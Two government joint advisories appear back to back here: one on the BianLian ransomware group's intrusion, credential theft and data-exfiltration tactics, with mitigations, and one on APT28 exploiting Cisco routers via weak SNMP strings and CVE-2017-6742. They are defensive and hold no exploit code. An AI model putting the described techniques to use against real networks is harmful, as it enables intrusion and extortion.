BianLian is a ransomware developer, deployer, and data extortion cybercriminal group. FBI observed BianLian group targeting organizations in multiple U.S. critical infrastructure sectors since June 2022. In Australia, ACSC has observed BianLian group predominately targeting private enterprises, including one critical infrastructure organization. BianLian group originally employed a double-extortion model in which they exfiltrated financial, client, business, technical, and personal files for leverage and encrypted victims’ systems. In 2023, FBI observed BianLian shift to primarily exfiltration-based extortion with victims’ systems left intact, and ACSC observed BianLian shift exclusively to exfiltration-based extortion. BianLian actors warn of financial, business, and legal ramifications if payment is not made.

Initial Access

BianLian group actors gain initial access to networks by leveraging compromised Remote Desktop Protocol (RDP) credentials likely acquired from initial access brokers [T1078],[T1133] or via phishing [T1566].

Command and Control

BianLian group actors implant a custom backdoor specific to each victim written in Go (see the Indicators of Compromise Section for an example) [T1587.001] and install remote management and access software—e.g., TeamViewer, Atera Agent, SplashTop, AnyDesk—for persistence and command and control [T1105],[T1219].

FBI also observed BianLian group actors create and/or activate local administrator accounts [T1136.001] and change those account passwords [T1098].

Defense Evasion

BianLian group actors use PowerShell [T1059.001] and Windows Command Shell [T1059.003] to disable antivirus tools [T1562.001], specifically Windows defender and Anti-Malware Scan Interface (AMSI). BianLian actors modify the Windows Registry [T1112] to disable tamper protection for Sophos SAVEnabled, SEDEenabled, and SAVService services, which enables them to uninstall these services. See Appendix: Windows PowerShell and Command Shell Activity for additional information, including specific commands they have used.

Discovery

BianLian group actors use a combination of compiled tools, which they first download to the victim environment, to learn about the victim’s environment. BianLian group actors have used:

• Advanced Port Scanner, a network scanner used to find open ports on network computers and retrieve versions of programs running on the detected ports [T1046].
• SoftPerfect Network Scanner (netscan.exe), a network scanner that can ping computers, scan ports, and discover shared folders [T1135].
• SharpShares to enumerate accessible network shares in a domain.
• PingCastle to enumerate Active Directory (AD) [T1482]. PingCastle provides an AD map to visualize the hierarchy of trust relationships.

BianLian actors also use native Windows tools and Windows Command Shell to:

• Query currently logged-in users [T1033].
• Query the domain controller to identify:
  • All groups [T1069.002].
  • Accounts in the Domain Admins and Domain Computers groups [1087.002].
  • All users in the domain.
• Retrieve a list of all domain controllers and domain trusts.
• Identify accessible devices on the network [T1018].

See Appendix: Windows PowerShell and Command Shell Activity for additional information, including specific commands they have used.

Credential Access

BianLian group uses valid accounts for lateral movement through the network and to pursue other follow-on activity. To obtain the credentials, BianLian group actors use Windows Command Shell to find unsecured credentials on the local machine [T1552.001]. FBI also observed BianLian harvest credentials from the Local Security Authority Subsystem Service (LSASS) memory [T1003.001], download RDP Recognizer (a tool that could be used to brute force RDP passwords or check for RDP vulnerabilities) to the victim system, and attempt to access an Active Directory domain database (NTDS.dit) [T1003.003].

In one case, FBI observed BianLian actors use a portable executable version of an Impacket tool (secretsdump.py) to move laterally to a domain controller and harvest credential hashes from it. Note: Impacket is a Python toolkit for programmatically constructing and manipulating network protocols. Through the Command Shell, an Impacket user with credentials can run commands on a remote device using the Windows management protocols required to support an enterprise network. Threat actors can run portable executable files on victim systems using local user rights, assuming the executable is not blocked by an application allowlist or antivirus solution.

See Appendix: Windows PowerShell and Command Shell Activity for additional information.

Persistence and Lateral Movement

BianLian group actors use PsExec and RDP with valid accounts for lateral movement [T1021.001]. Prior to using RDP, BianLian actors used Command Shell and native Windows tools to add user accounts to the local Remote Desktop Users group, modified the added account’s password, and modified Windows firewall rules to allow incoming RDP traffic [T1562.004]. See Appendix: Windows PowerShell and Command Shell Activity for additional information.

In one case, FBI found a forensic artifact (exp.exe) on a compromised system that likely exploits the Netlogon vulnerability (CVE-2020-1472) and connects to a domain controller.

Collection

FBI observed BianLian group actors using malware (system.exe) that enumerates registry [T1012] and files [T1083] and copies clipboard data from users [T1115].

Exfiltration and Impact

BianLian group actors search for sensitive files using PowerShell scripts (See Appendix: Windows PowerShell and Command Shell Activity) and exfiltrate them for data extortion. Prior to January 2023, BianLian actors encrypted files [T1486] after exfiltration for double extortion.

BianLian group uses File Transfer Protocol (FTP) [T1048] and Rclone, a tool used to sync files to cloud storage, to exfiltrate data [T1537]. FBI observed BianLian group actors install Rclone and other files in generic and typically unchecked folders such as programdatavmware and music folders. ACSC observed BianLian group actors use Mega file-sharing service to exfiltrate victim data [T1567.002].

BianLian’s encryptor (encryptor.exe) modified all encrypted files to have the .bianlian extension. The encryptor created a ransom note, Look at this instruction.txt, in each affected directory (see Figure 1 for an example ransom note.) According to the ransom note, BianLian group specifically looked for, encrypted, and exfiltrated financial, client, business, technical, and personal files.

If a victim refuses to pay the ransom demand, BianLian group threatens to publish exfiltrated data to a leak site maintained on the Tor network. The ransom note provides the Tox ID A4B3B0845DA242A64BF17E0DB4278EDF85855739667D3E2AE8B89D5439015F07E81D12D767FC, which does not vary across victims. The Tox ID directs the victim organization to a Tox chat via https://qtox.github[.]io and includes an alternative contact email address (swikipedia@onionmail[.]org or xxx@mail2tor[.]com). The email address is also the same address listed on the group’s Tor site under the contact information section. Each victim company is assigned a unique identifier included in the ransom note. BianLian group receives payments in unique cryptocurrency wallets for each victim company.

BianLian group engages in additional techniques to pressure the victim into paying the ransom; for example, printing the ransom note to printers on the compromised network. Employees of victim companies also reported receiving threatening telephone calls from individuals associated with BianLian group.

Indicators of Compromise (IOC)

See Table 1 for IOCs obtained from FBI investigations as of March 2023.

MITRE ATT&CK Techniques

See Table 2 for all referenced threat actor tactics and techniques in this advisory.

Mitigations

FBI, CISA, and ACSC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

• Reduce threat of malicious actors using remote access tools by:
  • Auditing remote access tools on your network to identify currently used and/or authorized software.
  • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T].
  • Using security software to detect instances of remote access software only being loaded in memory.
  • Requiring authorized remote access solutions only be used from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
  • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
• Implement application controls to manage and control execution of software, including allowlisting remote access programs.
  • Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.

See NSA Cybersecurity Information sheet Enforce Signed Software Execution Policies for additional guidance.

• Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Audit the network for systems using RDP.
  • Close unused RDP ports.
  • Enforce account lockouts after a specified number of attempts.
  • Apply phishing-resistant multifactor authentication (MFA).
  • Log RDP login attempts.
• Disable command-line and scripting activities and permissions [CPG 2.N].
• Restrict the use of PowerShell, using Group Policy, and only grant to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [CPG 2.E].
• Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
• Enable enhanced PowerShell logging [CPG 2.T, 2.U].
  • PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use.
  • Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).
  • The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.
• Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
• Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C].
• Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
• Reduce the threat of credential compromise via the following:
  • Place domain admin accounts in the protected users’ group to prevent caching of password hashes locally.
  • Implement Credential Guard for Windows 10 and Server 2016 (Refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
  • Refrain from storing plaintext credentials in scripts.
• Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E]. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory (AD) level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.

In addition, FBI, CISA, and ACSC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
• Maintain offline backups of data, and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization minimizes the impact of disruption to business practices as they will not be as severe and/or only have irretrievable data [CPG 2.R]. ACSC recommends organizations follow the 3-2-1 backup strategy in which organizations have three copies of data (one copy of production data and two backup copies) on two different media such as disk and tape, with one copy kept off-site for disaster recovery.
• Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies.
  • Use longer passwords consisting of at least 15 characters [CPG 2.B].
  • Store passwords in hashed format using industry-recognized password managers.
  • Add password user “salts” to shared login credentials.
  • Avoid reusing passwords [CPG 2.C].
  • Implement multiple failed login attempt account lockouts [CPG 2.G].
  • Disable password “hints”.
  • Refrain from requiring password changes more frequently than once per year.
    Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
  • Require administrator credentials to install software.
• Require phishing-resistant multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].
• Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours from vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
• Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks, restricting further lateral movement [CPG 2.F].
• Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections, as they have insight into common and uncommon network connections for each host [CPG 3.A].
• Install, regularly update, and enable real time detection for antivirus software on all hosts.
• Disable unused ports [CPG 2.V].
• Consider adding an email banner to emails received from outside your organization [CPG 2.M].
• Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

Validate Security Controls

In addition to applying mitigations, FBI, CISA, and ACSC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and ACSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

1. Select an ATT&CK technique described in this advisory (see Table 2).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI, CISA, and ACSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

• Stopransomware.gov, a whole-of-government approach with one central location for U.S. ransomware resources and alerts.
• cyber.gov.au for the Australian Government’s central location to report cyber incidents, including ransomware, and to see advice and alerts. The site also provides ransomware advisories for businesses and organizations to help mitigate cyber threats.
• CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide for guidance on mitigating and responding to a ransomware attack
• For no-cost cyber hygiene services for U.S. organizations,  Cyber Hygiene Services and Ransomware Readiness Assessment.

Reporting

The FBI is seeking any information that can be shared, including boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with BianLian actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report. Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ACSC via 1300 CYBER1 (1300 292 371) or by submitting a report cyber.gov.au.

Acknowledgements

Microsoft and Sophos contributed to this advisory.

APPENDIX: WINDOWS PowerSHell and COMMAND SHELL ACTIVITY

Through FBI investigations as of March 2023, FBI has observed BianLian actors use the commands in Table 3. ACSC has observed BianLian actors use some of the same commands.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and ACSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or ACSC.

APT28 accesses poorly maintained Cisco routers and deploys malware on unpatched devices using CVE-2017-6742.

Overview and Context

The UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure Security Agency (CISA) and US Federal Bureau of Investigation (FBI) are releasing this joint advisory to provide details of tactics, techniques and procedures (TTPs) associated with APT28’s exploitation of Cisco routers in 2021.

We assess that APT28 is almost certainly the Russian General Staff Main Intelligence Directorate (GRU) 85th special Service Centre (GTsSS) Military Intelligence Unit 26165. APT28 (also known as Fancy Bear, STRONTIUM, Pawn Storm, the Sednit Gang and Sofacy) is a highly skilled threat actor.

Download the UK PDF version of this report:

Download the US PDF version of this report:

Previous Activity

The NCSC has previously attributed the following activity to APT28:

• Cyber attacks against the German parliament in 2015, including data theft and disrupting email accounts of German Members of Parliament (MPs) and the Vice Chancellor
• Attempted attack against the Organization for the Prohibition of Chemical Weapons (OPCW) in April 2018, to disrupt independent analysis of chemicals weaponized by the GRU in the UK

For more information on APT28 activity, see the advisory Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.

As of 2021, APT28 has been observed using commercially available code repositories, and post-exploit frameworks such as Empire. This included the use of PowerShell Empire, in addition to Python versions of Empire.

Reconnaissance

Use of SNMP Protocol to Access Routers

In 2021, APT28 used infrastructure to masquerade Simple Network Management protocol (SNMP) access into Cisco routers worldwide. This included a small number based in Europe, US government institutions and approximately 250 Ukrainian victims.

SNMP is designed to allow network administrators to monitor and configure network devices remotely, but it can also be misused to obtain sensitive network information and, if vulnerable, exploit devices to penetrate a network.

A number of software tools can scan the entire network using SNMP, meaning that poor configuration such as using default or easy-to-guess community strings, can make a network susceptible to attacks.

Weak SNMP community strings, including the default “public,” allowed APT28 to gain access to router information. APT28 sent additional SNMP commands to enumerate router interfaces. [T1078.001]

The compromized routers were configured to accept SNMP v2 requests. SNMP v2 doesn’t support encryption and so all data, including community strings, is sent unencrypted.

Exploitation of CVE-2017-6742

APT28 exploited the vulnerability CVE-2017-6742 (Cisco Bug ID: CSCve54313) [T1190]. This vulnerability was first announced by Cisco on 29 June 2017, and patched software was made available. 

Cisco’s published advisory provided workarounds, such as limiting access to SNMP from trusted hosts only, or by disabling a number of SNMP Management Information bases (MIBs).

Malware Deployment

For some of the targeted devices, APT28 actors used an SNMP exploit to deploy malware, as detailed in the NCSC’s Jaguar Tooth Malware Analysis Report. This malware obtained further device information, which is exfiltrated over trivial file transfer protocol (TFTP), and enabled unauthenticated access via a backdoor.

The actor obtained this device information by executing a number of Command Line Interface (CLI) commands via the malware. It includes discovery of other devices on the network by querying the Address Resolution Protocol (ARP) table to obtain MAC addresses. [T1590]

Indicators of Compromise (IoCs)

Please refer to the accompanying Malware Analysis Report for indicators of compromise which may help to detect this activity.

MITRE ATT&CK®

This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.

For detailed TTPs, see the Malware Analysis Report.

Conclusion

APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742 (Cisco Bug ID: CSCve54313) as published by Cisco.

TTPs in this advisory may still be used against vulnerable Cisco devices. Organizations are advised to follow the mitigation advice in this advisory to defend against this activity.

Reporting

UK organizations should report any suspected compromises to the NCSC.
US organisations should contact CISA’s 24/7 Operations Centre at report@cisa.gov or (888) 282-0870.

Mitigation

Mitigation

• Patch devices as advised by Cisco. The NCSC also has general guidance on managing updates and keeping software up to date.
• Do not use SNMP if you are not required to configure or manage devices remotely to prevent unauthorized users from accessing your router.
  • If you are required to manage routers remotely, establish allow and deny lists for SNMP messages to prevent unauthorized users from accessing your router.
• Do not allow unencrypted (i.e., plaintext) management protocols, such as SNMP v2 and Telnet. Where encrypted protocols aren’t possible, you should carry out any management activities from outside the organization through an encrypted virtual private network (VPN), where both ends are mutually authenticated.
• Enforce a strong password policy. Don’t reuse the same password for multiple devices. Each device should have a unique password. Where possible, avoid legacy password-based authentication and implement two-factor authentication based on public-private key.
• Disable legacy unencrypted protocols such as Telnet and SNMP v1 or v2c. Where possible, use modern encrypted protocols such as SSH and SNMP v3. Harden the encryption protocols based on current best security practice. The NCSC strongly advises owners and operators to retire and replace legacy devices that can’t be configured to use SNMP v3.
• Use logging tools to record commands executed on your network devices, such as TACACS+ and Syslog. Use these logs to immediately highlight suspicious events and keep a record of events to support an investigation if the device’s integrity is ever in question. See NCSC guidance on monitoring and logging.
• If you suspect your router has been compromised:
  • Follow Cisco’s advice for verifying the Cisco IOS image.
  • Revoke all keys associated with that router. When replacing the router configuration be sure to create new keys rather than pasting from the old configuration.
  • Replace both the ROMMON and Cisco IOS image with an image that has been sourced directly from the Cisco website, in case third party and internal repositories have been compromised.
• NSA’s Network Infrastructure guide provides some best practices for SNMP.
• See also the Cisco IOS hardening guide and Cisco’s Jaguar Tooth blog.

This product is provided subject to this Notification and this Privacy & Use policy.